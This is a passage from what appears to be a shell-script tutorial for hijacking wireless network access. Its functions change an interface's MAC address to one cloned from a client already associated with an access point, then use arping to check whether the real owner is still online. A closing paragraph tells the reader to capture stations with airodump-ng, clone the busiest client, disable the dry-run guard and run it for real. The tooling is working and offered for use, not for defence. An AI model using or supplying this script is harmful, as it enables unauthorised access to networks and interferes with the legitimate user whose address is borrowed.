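  $_run ip link set dev "$1" down &&
  $_run ip link set dev "$1" address "$2" &&
  $_run ip link set dev "$1" up
}

# mac_in_use <iface> <ip>
# Once associated, the real owner of the borrowed MAC may still be online with
# the same IP. arping's duplicate-address-detection mode exits 0 when nobody
# else answers for the IP and 1 when someone does; this returns 0 (true) if
# the address is already in use, so you know to pick another station.
mac_in_use() {
  arping -D -I "$1" -c 2 "$2" >/dev/null 2>&1 && return 1
  return 0
}

# Demo: list candidates from the sample, then dry-run cloning the busiest one.
printf '%s' "$SAMPLE_CSV" | associated_stations
best=$(printf '%s' "$SAMPLE_CSV" | associated_stations | head -n 1 | cut -d' ' -f1)
DRY_RUN=1 clone_mac wlan0 "$best"
```

Run it for real with `airodump-ng -w dump eth2` for a minute, then `associated_stations < dump-01.csv`, drop DRY_RUN, and call `mac_in_use eth2 <your new ip>` after DHCP hands you an address; picking the client with the most packets buys you a MAC the AP has definitely accepted, but it is also the client most likely to still be online and fighting you for the same IP.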
CG